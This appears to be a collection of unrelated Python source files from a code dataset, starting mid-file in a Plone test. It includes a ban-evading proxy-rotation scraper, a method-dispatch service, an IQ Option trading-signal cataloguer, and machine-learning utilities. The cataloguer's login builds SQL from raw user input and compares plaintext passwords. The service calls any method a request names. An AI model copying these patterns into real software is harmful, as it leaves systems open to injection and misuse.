self.browser.open(self.portal_url)\n        self.browser.getLink('Video').click()\n        self.browser.getControl(\n            name='form.widgets.IDublinCore.title').value = \"My video\"\n        self.browser.getControl(\n            name='form.widgets.IDublinCore.description')\\\n            .value = \"This is my video.\"\n        file_path = os.path.join(test_file_dir, \"test.mp4\")\n        file_ctl = self.browser.getControl(\n            name='form.widgets.IVideo.video_file')\n        file_ctl.add_file(open(file_path), 'video/mp4', 'test.mp4')\n        self.browser.getControl('Save').click()\n        self.assertTrue('My video' in self.browser.contents)\n        self.assertTrue('This is my video' in self.browser.contents)\n        self.assertTrue('= len:\n            index = 0\n\n        return self.ipList[index]\n\n    def getSize(self):\n        if self.ipList is None:\n            raise Exception\n        return len(self.ipList)\n\n    def update_ipList(self):\n        self.get_all_IP(self.collection_name)\n\n    def update_ip_pool(self):\n        logger.info(\"Starting proxy pool update: re-checking stored IPs and scraping fresh ones from the web\")\n        start_time = time.time()\n        check()\n        execute_spider()\n        end_time = time.time()\n        logger.info(\"Reloading proxy IPs from the database into memory\")\n        self.update_ipList()\n        logger.info(\"Proxy pool update finished.. took {} seconds\".format(end_time - start_time))
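\n\n    # Added usage sketch (hypothetical call site -- the class name and constructor sit outside this excerpt):\n    #   resp = pool._request_with_proxy(url, use_proxy=True)  # rotates current_ip on failures\n    #   # a raised requests.exceptions.ProxyError means the pool already slept and refreshed itself; just retry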
\n\n    def _request_with_proxy(self,url,use_proxy):\n\n        headers = {\n            \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n            \"Accept-Encoding\": \"gzip, deflate, br\",\n            \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n            \"User-Agent\": random.choice(PC_USER_AGENTS)\n        }\n\n        # record the time we entered the retry loop\n        start_time = time.time()\n        while True:\n\n            # compare the current time with the start time; once the configured limit is exceeded, raise requests.exceptions.ProxyError\n            end_time = time.time()\n            if int(end_time - start_time) > proxy_timeout:\n                logger.info(\n                    \"_request_with_proxy ran for too long. Likely cause: every IP in the pool is stale or the target site banned them. Current ip is {}; sleeping for {} seconds\".format(\n                        self.current_ip, proxy_timeout))\n                time.sleep(proxy_timeout)\n                self.update_ip_pool()\n                msg = \"Proxy pool slept and was refreshed; please restart the crawl (see earlier log lines for the cause). Current ip is {}\".format(self.current_ip)\n                raise requests.exceptions.ProxyError(msg)\n            proxy = {\n                'http': self.current_ip,\n                'https': self.current_ip\n            }\n\n            if use_proxy:\n                try:\n                    response = requests.get(url, proxies=proxy, timeout=request_timeout, headers=headers)\n                    code = response.status_code\n                    msg = \"doing http request successfully current proxy ip is {} status_code :{}\".format(self.current_ip, code)\n                    logger.info(msg)\n\n                    if code == 404:\n                        msg = \" 404 Client Error: Not Found for url:{}\".format(url)\n                        logger.info(msg)\n                        return response\n\n                    response.raise_for_status()\n                    if code == 200 and custom_filter_str != '' and custom_filter_str in response.text:\n                        raise Exception\n\n                    return response\n                except requests.HTTPError as e:\n                    logger.info(e)\n                    self.current_ip = self.getRandomOne()\n                    msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n                    logger.info(msg)\n                except Exception as e:\n                    print(e)\n                    msg = \"ip is {} can't use \".format(self.current_ip)\n                    logger.info(msg)\n                    self.current_ip = self.getRandomOne()\n                    msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n                    logger.info(msg)\n            else:\n                try:\n                    response = requests.get(url, timeout=request_timeout, headers=headers)\n                    return response\n                except Exception as e:\n                    msg = \"ip is {} can't use \".format(self.current_ip)\n                    logger.info(msg)\n                    self.current_ip = self.getRandomOne()\n                    msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n                    logger.info(msg)\n\n\n\n","sub_path":"Request/MainRequest.py","file_name":"MainRequest.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466600425","text":"''' service.py\n\n    Server side service\n    \n    Extend this class to create a service.\n'''\n\nclass Service(object):\n    \n    def __init__(self):\n        # Initialize the service container that contains this service as None\n        # This will be populated with the correct value when the service\n        # is registered with container.register_service(service)\n        self._container = None\n\n    def handle_request(self, client_id, request):\n        ''' Handle a request message\n        \n        It's not necessary to implement this handler. 
The default\n        implementation will take the 'command' property from the \n        request message and attempt to execute it as a function,\n        passing the 'args' property as arguments\n        \n        Params\n        ======\n        client_id : string\n            Identifier for this client (should this be session instead?)\n        request : dictionary\n            Example \n            { \n                'path' : '/path/to/this/service', \n                'command' : 'method_to_invoke', \n                'args' : { } # args to pass to method\n            }\n        '''\n        command = request['command']\n        try:\n            self._client_id = client_id\n            func = getattr(self, command)\n            response = func(**request['args'])\n        except:\n            response = { 'status' : 'error', 'message' : traceback.format_exc() }\n        finally:\n            self._client_id = None\n\n        return response\n","sub_path":"src/zen/fabric/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425514676","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Thistledown\n@Contact : 120768091@qq.com\n@Software: PyCharm\n@File : hashmap.py\n@Time : 2018/9/11 21:31\n\"\"\"\n'Define your own dictionary class'\n'''\nBuild a dict-style data structure (a hashmap) out of plain lists\n'''\n\n'hashmap: a slotted list that holds key/value pairs' \\\n'aMap: a list variable' \\\n\n\n\ndef new(num_buckets=256): # i.e. hashmap.new()\n    '''Initializes a Map with the given number of buckets'''\n    '''Initialize a Map with the given number of buckets (storage slots).'''\n    # The notes below paraphrase the explanation from the official text\n    '> first, a function that creates (initializes) a hashmap' \\\n    '> make a list variable called aMap, then fill it with num_buckets empty buckets for the hashmap contents'\n    aMap = [] # aMap is a list\n    for i in range(0, num_buckets):\n        aMap.append([]) # every element of the list aMap is itself a list\n    return aMap\n\ndef hash_key(aMap, key): # i.e. hashmap.hash_key(key)\n    '''Given a key this will create a number and\n    then convert it to an index for the aMap\\\'s buckets.'''\n    'Given a key, hash_key() returns a hash value that can be used as an index'\n    '> hash_key is the core of how a dict works.' \\\n    '> the built-in hash() function turns the key (a string) into a number' \\\n    '> taking that number modulo len(aMap) picks the position where this key belongs' \\\n    '> the modulus (%) returns the remainder of a division, which caps large numbers into a small fixed range'\n    return hash(key) % len(aMap) # use the modulus (%) to turn the hash into a bucket index\n# hash() returns the hash value of an object (a string, a number, and so on)\n\ndef get_bucket(aMap, key): # i.e. hashmap.get_bucket(key)\n    '''Given a key, find the bucket where it would go.'''\n    'Given a key, locate the bucket in the list aMap that its hash points to'\n    '> get_bucket uses hash_key to find the bucket a key lives in' \\\n    '> whatever bucket_id comes back indexes into the aMap list, locating the bucket for that key'\n    bucket_id = hash_key(aMap, key) # bucket_id is the hashed index for this key/value pair\n    return aMap[bucket_id]\n\ndef get_slot(aMap, key, default=None):\n    '''\n    Returns the index, key, and value of a slot found in a bucket.\n    Returns -1, key, and default (None if not set) when not found.\n    '''\n    '> get_slot uses get_bucket to fetch the bucket a key lives in' \\\n    '> it scans every element of that bucket looking for the key; on a match it returns a tuple (i, k, v)' \\\n    '> where i is the index of the slot, k is the key itself, and v is the value stored for that key'\n    bucket = get_bucket(aMap, key)\n    for i, kv in enumerate(bucket):\n        # enumerate() pairs each element of an iterable with its index, which is handy in for loops\n        # i: the index; kv: one element of the bucket, a (key, value) pair (the bucket is a list, itself an element of aMap)\n        k, v = kv\n        if key == k:\n            return i, k, v # return the index, the key and the value\n\n    return -1, key, default\n\n'Works like dict.get(key, default=None): return the value for the given key, or default when the key is absent'\ndef get(aMap, key, default=None):\n    '''Gets the value in a bucket for the given key, or the default.'''\n    '> get is the convenience function people actually want from a hashmap.' \\\n    '> it calls get_slot for the tuple (i, k, v) but only returns v.'\n    i, k, v = get_slot(aMap, key, default=default)\n    return v
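\n\n# Added example of the functions above composing (comment-only sketch; set() is defined just below):\n#   states = new()                # 256 empty buckets\n#   set(states, 'Oregon', 'OR')   # hash_key -> get_bucket -> get_slot, then append/replace\n#   get(states, 'Oregon')         # -> 'OR'\n#   get(states, 'Texas', 'N/A')   # -> 'N/A' (the default for a missing key)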
\n\ndef set(aMap, key, value): # i.e. hashmap.set(key, value)\n    '''Sets the key to the value, replacing any existing value.'''\n    \"Store the key=>value pair in the dict aMap\"\n    '> set stores a key/value pair and appends it to the dict so it can be fetched again later' \\\n    '> to make sure each key is stored only once, first check whether the key already exists' \\\n    '> if it does, replace its old value; if it does not, append the new pair'\n    bucket = get_bucket(aMap, key)\n    i, k, v = get_slot(aMap, key) # i, k, v are the index, the key and the value\n\n    if i >= 0:\n        # the key exists, replace it\n        bucket[i] = (key, value)\n    else:\n        # the key does not, append to create it\n        bucket.append((key, value))\n\n'Delete the value stored under the given key'\ndef delete(aMap, key):\n    '''Deletes the given key from the Map.'''\n    '> delete removes a key: find the bucket it belongs to and delete the pair from that list' \\\n\n    bucket = get_bucket(aMap, key)\n\n    for i in range(len(bucket)):\n        k, v = bucket[i]\n        if key == k:\n            del bucket[i] # the del statement removes a list element (here the element at index i of the bucket)\n            break # break ends the enclosing while/for loop\n\n'Print out the elements of the dict'\ndef list(aMap):\n    '''Prints out what\\\'s in the Map.'''\n    for bucket in aMap:\n        if bucket:\n            for k, v in bucket:\n                # print(k, v)\n                print('\\\'', k, '\\\':', v)\n\n","sub_path":"ch3/hashmap.py","file_name":"hashmap.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"399392342","text":"from datetime import datetime\n\ndef strToHexArray(hexstr):\n\treturn [hexstr[i:i+2] for i in range(0, len(hexstr), 2)]\n\ndef get_week_data_hex_str():\n    return \"24FA\"\n\ndef get_time_query_hex_str(timestr):\n    # format \"yyyy mm dd hh\"\n    hexArray = timestr.split(\" \")\n    year = format(int(hexArray[0]), 'x')\n    month = format(int(hexArray[1]), 'x')\n    day = format(int(hexArray[2]), 'x')\n    if hexArray[3] is not None:\n    \thour = format(int(hexArray[3]), 'x')\n    \thexstr = \"2401\" + year + month + day + hour\n    else:\n    \thexstr = \"2402\" + year + month + day\n    \t\n    return hexstr\n\ndef parse_battery(hexArray):\n\treturn int(hexArray[1], 16)\n\ndef parse2Data(hexArray):\n    print(hexArray)\n    data = {}\n    for batch in range(3):\n        i = batch * 6 + 2\n        minute = int(hexArray[i+0], 16)\n        second = int(hexArray[i+1], 16)\n        heart_rate = int(hexArray[i+2], 16)\n        temperature = float(int(\"\".join(hexArray[i+3:i+5]), 16) / 100)\n        moving = int(hexArray[i+5], 16)\n        \n        data[batch] = {\n        \t\"minute\": minute,\n        \t\"second\":second,\n        \t\"heart_rate\":heart_rate,\n        \t\"temperature\":temperature,\n        \t\"moving\":moving\n        }\n        \n    return data\n    \ndef parseRealTimeData(hexArray):\n    print(hexArray)\n    year = int(\"\".join(hexArray[2:4]), 16)\n    month = int(hexArray[4], 16)\n    day = int(hexArray[5], 16)\n    hour = int(hexArray[6], 16)\n    minute = int(hexArray[7], 16)\n    second = int(hexArray[8], 16)\n    heart_rate = int(hexArray[9], 16)\n    temperature = float(int(\"\".join(hexArray[10:12]), 16) / 100)\n    moving = int(hexArray[12], 16)\n    \n    data = {\n    \t\"date_time\": datetime(year, month, day, hour, minute, second).strftime(\"%Y/%m/%d %H:%M:%S\"),\n    \t\"heart_rate\":heart_rate,\n    \t\"temperature\":temperature,\n    \t\"moving\":moving\n    }\n\n    return data","sub_path":"legacy_code/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571208891","text":"from iqoptionapi.stable_api import IQ_Option\r\nfrom datetime import datetime, timedelta\r\nfrom colorama import init, Fore, Back\r\nfrom time import time\r\nimport sys, os, configparser\r\nimport numpy as np\r\nfrom PyQt5 import uic,QtWidgets\r\nimport pymysql\r\n\r\ndb_name = \"bot_iqoption\"\r\nhost_db = \"localhost\"\r\nuser_db = \"root\"\r\nsenha_db = \"\"\r\n\r\ndef login_user():\r\n    \r\n    \r\n    email = login.lineLogin.text()\r\n    senha = 
login.lineSenha.text()\r\n \r\n conexao = pymysql.connect(host = host_db, user = user_db, passwd = senha_db, db = db_name)\r\n cursor = conexao.cursor()\r\n \r\n try:\r\n cursor.execute(\"SELECT senha FROM usuarios WHERE email = '{}'\".format(email))\r\n senha_dbase = cursor.fetchall()\r\n conexao.commit()\r\n conexao.close()\r\n except:\r\n login.loginErrado.setText(\"Login errado!\")\r\n \r\n if senha == senha_dbase[0][0]:\r\n login.close()\r\n catalogador.show()\r\n else:\r\n login.loginErrado.setText(\"Login errado!\")\r\n\r\ndef login_iqoption():\r\n \r\n global API\r\n email_iq = catalogador.lineEmail.text()\r\n senha_iq = catalogador.lineSenha.text()\r\n API = IQ_Option(email_iq, senha_iq)\r\n print('Conectando....')\r\n \r\n API.connect()\r\n\r\n if API.check_connect():\r\n print(\"Conectado\")\r\n else:\r\n print(\"conectado\")\r\n \r\n# def Conexao():\r\n# print('Conectando....')\r\n \r\n# API.connect()\r\n\r\n# if API.check_connect():\r\n# print(\"Conectado\")\r\n# else:\r\n# print(\"conectado\")\r\n\r\ndef cataloga(par, dias, prct_call, prct_put, timeframe):\r\n data = []\r\n datas_testadas = []\r\n time_ = time()\r\n sair = False\r\n while sair == False:\r\n velas = API.get_candles(par, (timeframe * 60), 1000, time_)\r\n velas.reverse()\r\n for x in velas:\r\n if datetime.fromtimestamp(x['from']).strftime('%Y-%m-%d') not in datas_testadas:\r\n datas_testadas.append(datetime.fromtimestamp(x['from']).strftime('%Y-%m-%d'))\r\n\r\n if len(datas_testadas) <= dias:\r\n x.update({'cor': 'verde' if x['open'] < x['close'] else 'vermelha' if x['open'] > x['close'] else 'doji'})\r\n data.append(x)\r\n else:\r\n sair = True\r\n break\r\n\r\n time_ = int(velas[-1]['from'] - 1)\r\n\r\n analise = {}\r\n for velas in data:\r\n horario = datetime.fromtimestamp(velas['from']).strftime('%H:%M')\r\n if horario not in analise: analise.update({horario: {'verde': 0, 'vermelha': 0, 'doji': 0, '%': 0, 'dir': ''}})\r\n analise[horario][velas['cor']] += 1\r\n\r\n try:\r\n analise[horario]['%'] = round(100 * (analise[horario]['verde'] / (analise[horario]['verde'] + analise[horario]['vermelha'] + analise[horario]['doji'])))\r\n except:\r\n pass\r\n\r\n for horario in analise:\r\n if analise[horario]['%'] > 50: analise[horario]['dir'] = 'CALL'\r\n if analise[horario]['%'] < 50: analise[horario]['%'], analise[horario]['dir'] = 100 - analise[horario]['%'], 'PUT '\r\n\r\n return analise\r\n\r\n\r\ndef Obter_Paridades():\r\n global API\r\n P = API.get_all_open_time()\r\n paridades = []\r\n pares = 'N'\r\n if pares == 'S':\r\n for pares in P['digital']:\r\n paridades.append(pares)\r\n for pares in P['turbo']:\r\n paridades.append(pares)\r\n else:\r\n for pares in P['digital']:\r\n if P['digital'][pares]['open'] == True:\r\n paridades.append(pares)\r\n for pares in P['turbo']:\r\n if P['turbo'][pares]['open'] == True:\r\n paridades.append(pares)\r\n\r\n return np.unique(paridades)\r\n\r\n\r\nprint('=========================================\\n| CATALOGADOR DE SINAIS |\\n=========================================')\r\ncheck_lista_config = \"S\"\r\narquivo_saida_config = \"lista.csv\"\r\narquivo_saida = arquivo_saida_config\r\ncheck_lista = check_lista_config\r\ntimeframe_config = \"5\"\r\ndias = int(30)\r\nporcentagem = int(100)\r\nmartingale = \"0\"\r\nprct_call = abs(porcentagem)\r\nprct_put = abs(100 - porcentagem)\r\nparidades = Obter_Paridades()\r\ndata = datetime.now().strftime('%Y-%m-%d')\r\nfor timeframe in timeframe_config:\r\n catalogacao = {}\r\n contador = 1\r\n for par in paridades:\r\n timer = 
int(time())\r\n print(f'{contador} - {Fore.GREEN}CATALOGANDO - {Fore.RESET} {Fore.BLUE}{par}{Fore.RESET} | TIMEFRAME {Fore.GREEN}M{timeframe}{Fore.RESET}...', end='')\r\n catalogacao.update({par: cataloga(par, dias, prct_call, prct_put, timeframe)})\r\n\r\n for par in catalogacao:\r\n for horario in sorted(catalogacao[par]):\r\n if martingale.strip() != '':\r\n\r\n mg_time = horario\r\n soma = {'verde': catalogacao[par][horario]['verde'], 'vermelha': catalogacao[par][horario]['vermelha'], 'doji': catalogacao[par][horario]['doji']}\r\n\r\n for i in range(int(martingale)):\r\n\r\n catalogacao[par][horario].update({'mg' + str(i + 1): {'verde': 0, 'vermelha': 0, 'doji': 0, '%': 0}})\r\n\r\n mg_time = str(datetime.strptime((datetime.now()).strftime('%Y-%m-%d ') + str(mg_time), '%Y-%m-%d %H:%M') + timedelta(minutes=timeframe))[11:-3]\r\n\r\n if mg_time in catalogacao[par]:\r\n catalogacao[par][horario]['mg' + str(i + 1)]['verde'] += catalogacao[par][mg_time]['verde'] + soma['verde']\r\n catalogacao[par][horario]['mg' + str(i + 1)]['vermelha'] += catalogacao[par][mg_time]['vermelha'] + soma['vermelha']\r\n catalogacao[par][horario]['mg' + str(i + 1)]['doji'] += catalogacao[par][mg_time]['doji'] + soma['doji']\r\n\r\n catalogacao[par][horario]['mg' + str(i + 1)]['%'] = round(100 * (catalogacao[par][horario]['mg' + str(i + 1)]['verde' if catalogacao[par][horario]['dir'] == 'CALL' else 'vermelha'] / (catalogacao[par][horario]['mg' + str(i + 1)]['verde'] + catalogacao[par][horario]['mg' + str(i + 1)]['vermelha'] + catalogacao[par][horario]['mg' + str(i + 1)]['doji'])))\r\n\r\n soma['verde'] += catalogacao[par][mg_time]['verde']\r\n soma['vermelha'] += catalogacao[par][mg_time]['vermelha']\r\n soma['doji'] += catalogacao[par][mg_time]['doji']\r\n else:\r\n catalogacao[par][horario]['mg' + str(i + 1)]['%'] = 0\r\n\r\n print('finalizado em ' + str(int(time()) - timer) + ' segundos')\r\n contador += 1\r\n\r\n print('\\n\\n')\r\n\r\n for par in catalogacao:\r\n for horario in sorted(catalogacao[par]):\r\n ok = False\r\n\r\n if catalogacao[par][horario]['%'] >= porcentagem:\r\n ok = True\r\n else:\r\n for i in range(int(martingale)):\r\n if catalogacao[par][horario]['mg' + str(i + 1)]['%'] >= porcentagem:\r\n ok = True\r\n break\r\n\r\n if ok == True:\r\n\r\n msg = Fore.YELLOW + par + Fore.RESET + ' - ' + horario + ' - ' + (Fore.RED if catalogacao[par][horario]['dir'] == 'PUT ' else Fore.GREEN) + catalogacao[par][horario]['dir'] + Fore.RESET + ' - ' + str(catalogacao[par][horario]['%']) + '% - ' + Back.GREEN + Fore.BLACK + str(catalogacao[par][horario]['verde']) + Back.RED + Fore.BLACK + str(catalogacao[par][horario]['vermelha']) + Back.RESET + Fore.RESET + str(catalogacao[par][horario]['doji'])\r\n\r\n if martingale.strip() != '':\r\n for i in range(int(martingale)):\r\n if str(catalogacao[par][horario]['mg' + str(i + 1)]['%']) != 'N/A':\r\n msg += ' | MG ' + str(i + 1) + ' - ' + str(catalogacao[par][horario]['mg' + str(i + 1)]['%']) + '% - ' + Back.GREEN + Fore.BLACK + str(catalogacao[par][horario]['mg' + str(i + 1)]['verde']) + Back.RED + Fore.BLACK + str(catalogacao[par][horario]['mg' + str(i + 1)]['vermelha']) + Back.RESET + Fore.RESET + str(catalogacao[par][horario]['mg' + str(i + 1)]['doji'])\r\n else:\r\n msg += ' | MG ' + str(i + 1) + ' - N/A - N/A'\r\n\r\n print(msg)\r\n direcao = catalogacao[par][horario]['dir'].strip()\r\n open(arquivo_saida, 'a').write('M' + str(timeframe) + ';' + par + ';' + horario + ';' + direcao + '\\n')\r\n if check_lista == 'S':\r\n open(str(arquivo_saida) + '-CHECK', 
'a').write(f'{data} {str(horario) + \":00\"} {par} {direcao} {str(martingale) + \"GL\"} {str(timeframe) + \"TM\"}\\n')\r\n\r\napp = QtWidgets.QApplication([])\r\nlogin = uic.loadUi(\"login.ui\")\r\ncatalogador = uic.loadUi(\"catalogador.ui\")\r\nlogin.btnLogin.clicked.connect(login_user)\r\ncatalogador.btnLogin.clicked.connect(login_iqoption)\r\ncatalogador.btnLogin.clicked.connect(cataloga)\r\n\r\n\r\nlogin.show()\r\napp.exec()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"66198173","text":"# Dependancies\nimport pandas as pd\n\n# We can use the read_html function in Pandas \n# to automatically scrape any tabular data from a page.\n\n# URL of website to scrape\nurl = 'https://en.wikipedia.org/wiki/List_of_capitals_in_the_United_States'\n\n# Read HTML\ntables = pd.read_html(url)\ntables\n\n# What we get in return is a list of dataframes for any tabular data that Pandas found.\n# We can slice off any of those dataframes that we want using normal indexing.\n\n# Select first table as df\ndf = tables[0]\n\n# Establish columns\ndf.columns = ['State', 'Abr.', 'State-hood Rank', 'Capital', \n 'Capital Since', 'Area (sq-mi)', 'Municipal Population', 'Metropolitan', \n 'Metropolitan Population', 'Population Rank', 'Notes']\n# Display\ndf.head()\n\n# Cleanup of extra rows\ndf = df.iloc[2:]\ndf.head()\n\n# Set the index to the State column\ndf.set_index('State', inplace=True)\ndf.head()\n\n# That way we can display all info about a row\ndf.loc['Alabama']\n\n\n# Pandas also had a to_html method that we can use to generate HTML tables from DataFrames.\nhtml_table = df.to_html()\nhtml_table\n\n# You may have to strip unwanted newlines to clean up the table.\nhtml_table.replace('\\n', '')\n\n# You can also save the table directly to a file.\ndf.to_html('table.html')","sub_path":"Templates/Pandas/Pandas_web_scraping.py","file_name":"Pandas_web_scraping.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198841860","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport torch\nfrom torch.autograd import Variable\n\nfrom tokens import *\nfrom vocabulary import Vocabulary\n\n\ndef loadData(\n filename : str,\n word_vocab: Vocabulary,\n tag_vocab : Vocabulary,\n delimiter : str=\"/\",\n):\n words_list = []\n tags_list = []\n\n for line in open(filename, \"r\").readlines():\n \n words = []\n tags = []\n \n for chunk in line.rstrip().split(\" \"):\n chunk = chunk.split(delimiter)\n assert len(chunk) == 2\n\n words += [chunk[0]]\n tags += [chunk[1]]\n \n words_list += [words]\n tags_list += [tags]\n\n return words_list, tags_list\n\n\ndef fill(\n batch: list,\n lens : list,\n pad : int=-1,\n):\n len_max = max(lens)\n\n return [\n batch[i] + [pad] * (len_max - lens[i])\n for i in range(len(lens))\n ]\n\n\ndef getMask(lens: list):\n len_max = max(lens)\n \n return torch.ByteTensor(\n [\n [0] * lens[i] + [1] * (len_max - lens[i])\n for i in range(len(lens))\n ]\n )\n\n\ndef getMinibatch(\n batch_words: list,\n batch_tags : list,\n word_vocab : Vocabulary,\n char_vocab : Vocabulary,\n tag_vocab : Vocabulary,\n device : torch.device,\n):\n sorted_pairs = [\n [s, t]\n for s, t in sorted(\n [ [_s, _t] for _s, _t in zip(batch_words, batch_tags) ],\n key=lambda x: len(x[0]), reverse=True,\n )\n ]\n\n batch_words = [x[0] for x in sorted_pairs]\n batch_word_lens = [len(x) for x 
in batch_words]\n batch_tags = [x[1] for x in sorted_pairs] \n\n max_len_batch = max(batch_word_lens)\n batch_size = len(batch_words)\n\n _batch_chars = []\n batch_char_lens = []\n\n for j in range(max_len_batch):\n chars = []\n for i in range(batch_size):\n if j >= len(batch_words[i]):\n chars += [[char_vocab.w2i[EOS]]]\n else:\n chars += [char_vocab.toIds(list(batch_words[i][j]))]\n\n _batch_chars += [chars]\n batch_char_lens += [[len(c) for c in chars]]\n\n batch_words = [word_vocab.toIds(s) for s in batch_words]\n batch_tags = [tag_vocab.toTagIds(s) for s in batch_tags]\n\n batch_chars = []\n for c, l in zip(_batch_chars, batch_char_lens):\n batch_chars += [\n torch.LongTensor(\n fill(c, l, char_vocab.w2i[EOS])\n ).to(device)\n ]\n\n batch_words = torch.LongTensor(\n fill(\n batch_words,\n batch_word_lens,\n word_vocab.w2i[EOS],\n #word_vocab.w2i[PAD],\n )\n ).to(device)\n\n batch_tags = torch.LongTensor(\n fill(\n batch_tags,\n batch_word_lens,\n tag_vocab.t2i[STOP],\n )\n ).to(device)\n\n batch_word_mask = getMask(batch_word_lens).to(device)\n\n #return batch_words, batch_tags, batch_masks, batch_word_lens\n return batch_words, batch_word_lens, batch_word_mask, batch_chars, batch_char_lens, batch_tags\n\n\ndef getOrder(lens: list):\n lens = torch.LongTensor(lens)\n sorted_lens, order = torch.sort(lens, descending=True)\n return sorted_lens, order\n\n\ndef getOrderOrig(\n order: torch.LongTensor,\n):\n pairs = [\n (o1, o2)\n for o1, o2 in zip(order.tolist(), list(range(len(order))))\n ]\n pairs.sort(key=lambda x: x[0])\n\n order_orig = [o2 for o1, o2 in pairs]\n return torch.LongTensor(order_orig)\n\n\n\n","sub_path":"scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"440893940","text":"import tensorflow as tf\nkeras = tf.compat.v2.keras\n\ndef model(model_base, output_shape):\n model = keras.Sequential([\n model_base,\n keras.layers.Dropout(0.25),\n keras.layers.Flatten(),\n keras.layers.Dense(1024, activation='relu', kernel_initializer='glorot_uniform', bias_initializer='zeros', name='dense'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(128, activation='relu', kernel_initializer='glorot_uniform', bias_initializer='zeros', name='embed'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(output_shape, kernel_initializer='glorot_uniform', bias_initializer='zeros', name='logits'),\n keras.layers.Activation('softmax', name='preds'),\n ])\n\n model.layers[0].trainable = False\n\n return model\n\n\ndef trainable_top(model):\n model.layers[0].trainable = False\n for layer in model.layers[1:]:\n layer.trainable = True\n\n return model\n\n\ndef trainable_base_top(model, num_base_layers_to_train=4):\n for layer in model.layers[0].layers[:-num_base_layers_to_train]:\n layer.trainable = False\n\n for layer in model.layers[0].layers[-num_base_layers_to_train:]:\n layer.trainable = True\n\n for layer in model.layers[1:]:\n layer.trainable = True \n\n return model\n\n\ndef trainable(model):\n for layer in model.layers[0].layers:\n layer.trainable = True\n\n for layer in model.layers[1:]:\n layer.trainable = True \n\n return model\n\n\ndef train(\n model, \n datasource, \n datasource_size, \n epochs, \n batch_size, \n callbacks, \n verbose=1, \n val_datasource=None, \n val_datasource_size=None \n):\n ''' fine-tuning procedure\n '''\n validation_steps = val_datasource_size//batch_size if val_datasource_size else None\n\n if verbose:\n print('Training top only')\n 
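# Added note: train() fine-tunes in three equal stages of epochs//3 each --\n    # (1) the classifier head only, (2) the head plus the last 4 base layers via\n    # trainable_base_top(model, 4), (3) the whole network -- recompiling before\n    # each stage so the updated trainable flags take effect.\n    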
model = trainable_top(model)\n    model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n    model.fit( \n        x=datasource, \n        validation_data=val_datasource,\n        epochs=epochs//3, \n        steps_per_epoch=datasource_size//batch_size, \n        validation_steps=validation_steps,\n        callbacks=callbacks,\n        verbose=verbose,\n    )\n    if verbose:\n        print('Training top and base top {} layers'.format(4))\n    model = trainable_base_top(model, 4)\n    model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n    model.fit( \n        x=datasource, \n        validation_data=val_datasource,\n        epochs=epochs//3, \n        steps_per_epoch=datasource_size//batch_size, \n        validation_steps=validation_steps,\n        callbacks=callbacks,\n        verbose=verbose,\n    )\n    if verbose:\n        print('Training whole network')\n    model = trainable(model)\n    model.compile(loss=model.loss, optimizer=model.optimizer, metrics=model.metrics)\n    model.fit( \n        x=datasource, \n        validation_data=val_datasource,\n        epochs=epochs//3, \n        steps_per_epoch=datasource_size//batch_size, \n        validation_steps=validation_steps,\n        callbacks=callbacks,\n        verbose=verbose,\n    )","sub_path":"models/classic.py","file_name":"classic.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25342178","text":"# coding: utf-8\n\n'''\n    parsers.py\n\n    Contains parser objects constructed for various datasets that\n    will be used to build the .belns, .beleq, and .belanno files.\n\n'''\n\nfrom common import gzip_to_text\nfrom lxml import etree\nimport os\nimport csv\nimport gzip\nimport urllib.request\nimport zipfile\nimport io\n\nclass Parser(object):\n    def __init__(self, url):\n        self.url = url\n        self.verbose = False\n\n    def is_verbose(self):\n        self.verbose = True\n\n    def parse(self):\n        pass\n\n\nclass EntrezGeneInfoParser(Parser):\n    resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n                          namespace/entrez-gene-ids-hmr.belns\"\"\"\n\n    def __init__(self, url):\n        super(EntrezGeneInfoParser, self).__init__(url)\n        self.entrez_info = url\n\n    def parse(self):\n\n        # columns for an Entrez gene info dataset.\n        entrez_info_headers = ['tax_id', 'GeneID', 'Symbol', 'LocusTag',\n                               'Synonyms', 'dbXrefs', 'chromosome',\n                               'map_location', 'description',\n                               'type_of_gene',\n                               'Symbol_from_nomenclature_authority',\n                               'Full_name_from_nomenclature_authority',\n                               'Nomenclature_status',\n                               'Other_designations', 'Modification_date']\n\n        # dictionary for base gene info\n        info_csvr = csv.DictReader(gzip_to_text(self.entrez_info),\n                                   delimiter='\\t',\n                                   fieldnames=entrez_info_headers)\n\n        for row in info_csvr:\n            if row['tax_id'] in ('9606', '10090', '10116'):\n                yield row\n\n    def __str__(self):\n        return \"EntrezGeneInfo_Parser\"\n\n\nclass EntrezGeneHistoryParser(Parser):\n    resourceLocation = \"\"\"http://resource.belframework.org/belframework/1.0/\n                          